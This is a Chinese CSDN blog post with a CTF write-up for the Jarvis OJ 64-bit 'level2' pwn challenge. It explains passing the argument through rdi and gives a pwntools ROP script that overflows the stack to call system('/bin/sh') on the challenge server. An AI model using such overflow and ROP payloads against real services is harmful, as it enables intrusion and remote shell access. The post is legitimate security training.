Jarvis oj-pwn level2-64

最新推荐文章于 2020-07-06 18:14:04 发布
最新推荐文章于 2020-07-06 18:14:04 发布
阅读量125 收藏
点赞数
分类专栏: Jarvis OJ CTF解题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hanqdi_/article/details/104239222
版权

pwn level2-64

  1. 检查保护机制
    在这里插入图片描述
  2. 放入ida分析
    在这里插入图片描述
    在这里插入图片描述
  3. 在ida 中发现有system函数,再查找下也有binsh字符串。
    在这里插入图片描述
  4. 由于是64位的,所以,传参数时要注意,前6个参数是存在寄存器里的。
    在这里插入图片描述
  5. rdi的地址
    在这里插入图片描述
  6. 利用pop ret 指令来传递参数,pop rdi,将参数binsh弹出栈,并存入rdi寄存器中,再ret返回栈中,再执行system函数,参数从rdi中取出。
  7. 构造脚本如下:
from pwn import *
r = remote("pwn2.jarvisoj.com",9882)

system_addr = 0x004004c0
binsh_addr = 0x00600a90
pop_rdi = 0x004006b3

payload = 'a'*0x80+'b'*8+p64(pop_rdi)+p64(binsh_addr)+p64(system_addr)

r.sendline(payload)
r.interactive()
123111234
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jarvislevel2_x64--64位简单栈溢出
qq_43613144的博客
07-26 421
ROPgadget 查找可存储寄存器的代码 ROPgadget --binary level_x64(名字) --only 'pop|ret' | grep 'eax' 查找字符串 ROPgadget --binary rop --string "/bin/sh" 查找有int 0x80的地址 ROPgadget --binary rop --only 'int' ...
夏令营第二周pwnlevel-x64题总结
MIGENGKING的博客
07-26 341
今天我来总结一下pwnlevel2_x64: 我们直接把题目放进ubuntu虚拟机查看题目: 发现题目的arch模块是64位的;NX保护模式开启,所无法构建shellcode拿到shell/ 接下把文件放进IDAx64分析: ...
jarvis oj level2_x64
发蝴蝶和大脑斧的博客
12-05 522
接下来做64位了,首先看下和32位有什么不一样。这篇文章的第3节说的很详细 主要来说就是: 1.内存地址的范围由32位变成了64位,但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。 2.x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。我们要修改寄存器的值就得通过找到例如pop rdi;ret这样...
CTF-PWN-level2(x64)(Jarvis OJ)
SuperGate的博客
02-15 493
这道题和level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。 由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。 同样的,程序中hint存入了/bin/sh,我们直接使用即可。 system函数的地址也很容易获得,剩下的就是pop e...
jarivs oj中的level2与level2_x64
qq_45213259的博客
07-25 249
jarivs oj中的level2与level2_x64的相同与区别 level2 题目链接https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1 对于这道题,按照基本思路就是先拖入ubuntu中进行查壳,输入checksec level2 然后我们会发现它只打开了NX保护机制,又是典型的栈溢出...
JarvisOJ-PWN-Level1
杀生丸?不,其实我要的是桔梗
03-16 832
JarvisOJ-PWN-Level 先checksec一下: 发现NX栈保护没有打开,也就是堆栈代码没有进行保护,那么就就题目很可能就是要输入shellcode在栈里执行吧。 打开IDA分析(32位): 主函数: vulner..fuction()函数: 题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。 然后输出Holle world。 我们再看b...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
JarvisAlgorithm:Jarvis算法-Java
03-06
Jarvis算法,又称礼品包装算法,是计算几何领域中用于寻找给定点集的凸包的经典算法。这个算法由Marvin Jarvis于1973年提出,主要用于处理二维空间中的点集问题。在Java编程语言中,我们可以实现这个算法来创建一个...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1404
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
pwntools之recv,send方法的理解
热门推荐
hanqdi_的博客
07-06 1万+
pwntools学习 一般在做pwn题,写利用脚本时,会用到recv,send等函数,之前我理解问什么send,不理解recv的作用,现在通过一道题目理解了。下面详细讲解下recv及send的作用。 remote(“一个域名或者ip地址”, 端口) 会连接到我们指定的地址及端口。 然后该函数会返回remote对象 (这里,我们将该对象保存到了变量 c)。remote对象主要用来进行对远程主机的输入输出。 主要方法有: 接收远端传回的数据 interactive() : 在取得shell之后使用,直接进行交
2019.3.5(正月二十九周二)zip加密文件破解常用方法+解题PkCrack
hanqdi_的博客
03-05 4116
破解Zip加密文件的[常用方法] https://www.cnblogs.com/ECJTUACM-873284962/p/9387711.html (找的大佬的博客) Zip属性隐藏 Zip伪加密 暴力破解 明文攻击 CRC32碰撞 例题——PkCrack 解题步骤: 从题目来看,是明文攻击类型 明文攻击是一种较为高效的攻击手段,大致原理是当你不知道一个zip的密码,但是你有zip中的...
攻防世界-pwn 新手练习区
hanqdi_的博客
02-24 2282
when_the_your_born 要求v5=1926即可得到flag,而根据程序,v5只要等于1926就进入不了这个分支,也就是说,我们输入的v5不能等于1926。 这里可以利用gets函数的输入v4,来覆盖v5。 v4:ebp-0x20 v5:ebp-0x18 v4和v5相差0x08,即在输入v4时,先输入0x08个垃圾数据,在输入1926即可实现覆盖。 payload如下 from pw...
攻防世界-pwn-dice_game(srand(),rand(),随机数)
hanqdi_的博客
06-27 1854
高手进阶区 dice_game 考察知识点: srand(),rand()函数,产生随机数。 srand和rand()配合使用产生伪随机数序列。 rand函数在产生随机数前,需要系统提供的生成伪随机数序列的种子,rand根据这个种子的值产生一系列随机数。 如果系统提供的种子没有变化,每次调用rand函数生成的伪随机数序列都是一样的。 比如:通常可以利用系统时间来改变系统的种子值,即srand(time(NULL)),可以为rand函数提供不同的种子值,进而产生不同的随机数序列。 如果srand(1),因为1
Javris OJ - pwn level5(mmap和mprotect练习)(_libc_csu_init中的通用gedget的使用)
hanqdi_的博客
02-14 1736
pwn level5 这个题和level3-64的附件一样,level5要求不用system和execve,而是用mprotect和mmap,mmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行,mprotect函数是将从addr开始的地址 ,长度位len的内存的访问权限。 可以这样做:利用shellcode,利用read函数把shellcode写入bss段,这里要求写入...
Javris oj -pwn tell me something
hanqdi_的博客
02-04 581
pwn - tell me something 修改权限:chmod 777 guestbook 检查保护机制:checksec guestbook 64位文件,开启堆栈不可执行保护,不能往堆栈里写入shellcode解题。 用64位ida打开guestbook,找漏洞点 from pwn import * r=remote('pwn.jarvisoj.com',9876) pay...
jarvisoj_level2
最新发布
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值